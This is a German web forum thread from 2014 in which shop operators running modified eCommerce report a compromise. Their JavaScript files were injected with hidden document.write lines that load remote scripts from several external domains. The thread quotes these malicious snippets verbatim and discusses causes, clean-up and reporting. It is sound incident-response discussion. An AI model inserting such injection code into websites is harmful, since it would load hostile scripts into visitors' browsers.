Shop Hosting
Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:

Autor Thema: Shop gehackt - Umleitung auf c2consultores.com.ar  (Gelesen 12681 mal)

Offline digicam

  • Fördermitglied
  • *****
  • Beiträge: 122
    • Teile Beitrag
Shop gehackt - Umleitung auf c2consultores.com.ar
« am: 01. März 2014, 21:26:13 »
Hallo Freunde,

ich bin nicht sicher, ob es nur bei mir so ist, aber in den ganzen Javascript-Files steht ganz unten der Eintrag:
Code: PHP  [Auswählen]
/*9e2d00*/

                                                                                                                                                                                         /*rabgrabg09212rabg09*/

document.write("<script type='text/javascript' src='http://c2consultores.com.ar/DQvZ6HwK.php?id=22720734'></"+ "script>");


/*/9e2d00*/
 

Schaut euch die ganzen js-Files unter /templates/xtc5/javascript/ mal an, hat jemand von euch auch diesen Eintrag?
Ich werde die js-Files alle säubern und die Berechtigung 444 vergeben, vorher hatten die 644 gehabt.
Gruß
digicam


Linkback: https://www.modified-shop.org/forum/index.php?topic=29534.0

Offline juergen-f

  • Neu im Forum
  • *
  • Beiträge: 35
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #1 am: 01. März 2014, 22:22:38 »
Hi,

du bist nicht der einzige, der im Moment mit diesem Sche... zu kämpfen hat....
Bei mir haben sie in alle js-Dateien auf meinem Server (nicht nur in meinem Shop, sondern auch in allen anderen Projekten auf dem Server) mit folgenden Code verseucht:

Code: PHP  [Auswählen]

/*19f955*/

                                                                                                                                                                                         /*qbqb0904674qb09*/

document.write("<script type='text/javascript' src='http://rouladenroessl.de/images/bmvfhkJ7.php?id='></"+ "script>");


/*/19f955*/

 

Habe ein Serverbackup eingespielt und alle Passwörter geändert. Mal sehen, wie lange es diesmal dauert, bis wieder was passiert.
Letztes Jahr hatten die Penner alle index-Dateien beschmiert.

Gruß

Jürgen

Offline digicam

  • Fördermitglied
  • *****
  • Beiträge: 122
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #2 am: 01. März 2014, 22:35:07 »
Oh danke, ich dachte schon, dass nur ich wieder Pech habe. Wie haben es die bösen Buben geschafft? Ich hab die ganzen Server-Logs ausgewertet und nichts gefunden. Haben wir irgendwo einen Leck in der Modified?
Gruß
digicam

Offline Matt

  • Experte
  • *****
  • Beiträge: 4.241
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #3 am: 01. März 2014, 22:57:41 »
Vermutlich über ausgespähte FTP-Passwörter vom lokalen Rechner. Da der Schadcode so offensichtlich in den Files steht spricht das nicht dafür, dass man sich beim eigentlichen Angriff besonders viel Mühe gegeben hat.

Offline digicam

  • Fördermitglied
  • *****
  • Beiträge: 122
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #4 am: 01. März 2014, 23:07:49 »
Hi Matt, also meinst du dass ich trotz Virenscanner trotzdem einen Spion auf der Platte hab? Was kann ich dagegen tun?
Danke
digicam

Offline Matt

  • Experte
  • *****
  • Beiträge: 4.241
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #5 am: 01. März 2014, 23:11:53 »
Ja, das meine ich. Hast du mal das FTP-Log geprüft ob es da Logins zu Uhrzeiten gab, die unmöglich von dir sein können?

Was du dagegen tun kannst? Gute Frage, das sind hier eher die Leute gefordert, die sich mit Windows auskennen. Ich würde aber mal nen anderen Virenscanner versuchen.

Offline juergen-f

  • Neu im Forum
  • *
  • Beiträge: 35
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #6 am: 01. März 2014, 23:22:18 »
Über "meine" FTP-Passwörter kann der Angriff (eigendlich) nicht gekommen sein, da auch vermieteter Webspace betroffen war, wo ich die Passwörter nicht mal kenne.
Irgendwie müssen die über das Server-Administratorpasswort auf den Server gekommen sein...
Nur werden bei mir keine Passwörter gespeichert. Auch die Virenscanner können nichts finden. Habe eben einen neuen Scanner durchlaufen lassen. Der hat ein paar infizierte Dateien gefunden...

Hoffe, auch die Datei, die Infos an diese Idioten schickt.....

Jürgen

Offline Belamcando

  • Fördermitglied
  • *****
  • Beiträge: 11
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #7 am: 01. März 2014, 23:38:10 »
Hallo, bei mir steht nun überall Folgendes in den js-Dateien:

/*ff3574*/
 /*pcpc092065pc09*/
document.write("<script type='text/javascript' src='http://sisteweb.it/yjHKQkFt.php?id=20088487'></"+ "script>");
/*/ff3574*/

Nur kenne ich mich leider nicht so gut aus, dass ich damit so "cool" umgehen kann wie Ihr anscheinend. Wäre dankbar für einen Tipp bzw. wohl mehrere Tipps, wie ich den Unfug wieder los werde? Das fängt schon mal damit an, dass ich gerne wüsste, welche Dateien überhaupt betroffen sein können. Und was heisst alle PW ändern? Auch das DB-Passwort? Dann muss die Shopkonfiguration auch neu gemacht werden, oder? PW für ftp-Zugang habe ich geändert, auch den Zugang zu phpmyadmin und das Admin-PW vom Shop selber. Die Sache macht mich gerade etwas nervös ...

Besten Dank schonmal,
Belamcando

Offline digicam

  • Fördermitglied
  • *****
  • Beiträge: 122
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #8 am: 01. März 2014, 23:54:35 »
Hallo Belamcando, so wie ich es sehe kommst du um eine Wiederherstellung aus deinem letzten Backup nicht herum. Bis jetzt habe ich alle js-Dateien mit dem heutigen Datum gefunden, die infiziert waren, also nicht nur im Template, sondern auch im /admin/includes/
Gruß
digicam

Offline digicam

  • Fördermitglied
  • *****
  • Beiträge: 122
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #9 am: 02. März 2014, 00:48:34 »
Benutzt einer vielleicht in Firefox das Add-On S3.Download Statusbar? Ich habe das Add-On in Verdacht, dass es meine gespeicherten Passwörter weiter gesendet hat. Kann es hier ein Betroffener bestätigen?
Danke
digicam

Offline Bonner

  • Fördermitglied
  • *****
  • Beiträge: 714
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #10 am: 02. März 2014, 10:36:15 »
Wie es scheint, bin ich ja nicht der Einzige der derzeit Probleme hat.

Code: PHP  [Auswählen]
;

/*f55735*/

                                                                                                                                                                                         /*ogajrogajr09883ogajr09*/

document.write("<script type='text/javascript' src='http://ergotronics.de/rnH7Vpfx.php?id=28427126'></"+ "script>");


/*/f55735*/
 

Hatte gestern ja auch eigentlich nix vor ....

Nach meinen Recherchen sind wohl alle Javascript Dateien befallen.

Alles platt gemacht, Backup eingespielt und es lief wieder.

Dann habe ich mich mal auf die Suche gemacht, wohin der ganze Mist geroutet wird..ergotronics hat eine IP, die auf eine Serverfarm im Münchener Raum verweist.
Wäre mal interessant zu wissen, wo bei den anderen Fällen die Server stehen.

Im Gespräch mit meinem Hoster habe ich dann mal die Sicherheitseinstellungen verschärft, was für mich bei Änderungen zwar umständlicher ist, aber die Arbeit gestern brauch ich nicht öfter!

Bonner

Offline Bonner

  • Fördermitglied
  • *****
  • Beiträge: 714
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #11 am: 02. März 2014, 10:50:18 »
Hab grad mal nachgeguckt...auch der Eintrag von jurgen-f verweist auf die gleicher Serverfarm

Netbeat Domain Hosting Farm in München

Bonner

Offline Gradler

  • Viel Schreiber
  • *****
  • Beiträge: 2.083
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #12 am: 02. März 2014, 10:54:50 »
Dann wäre es doch wohl an der Zeit für Strafanzeigen.

Offline Bonner

  • Fördermitglied
  • *****
  • Beiträge: 714
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #13 am: 02. März 2014, 11:10:38 »
Ich hatte mal dran gedacht, ev. das BSI zu kontaktieren.

Offline Gradler

  • Viel Schreiber
  • *****
  • Beiträge: 2.083
  • Geschlecht: Männlich
    • Teile Beitrag
Re: Shop gehackt - Umleitung auf c2consultores.com.ar
« Antwort #14 am: 02. März 2014, 11:32:35 »
Und jetzt willst Du warten bis die wieder so 'ne Webseite machen um dann durch Eintragung feststellen wollen ob Du auch wirklich gehackt wurdest?

Haendlerbund_Leistungen_728x90_animiert

Teile per facebook Teile per linkedin Teile per twitter

 


             
anything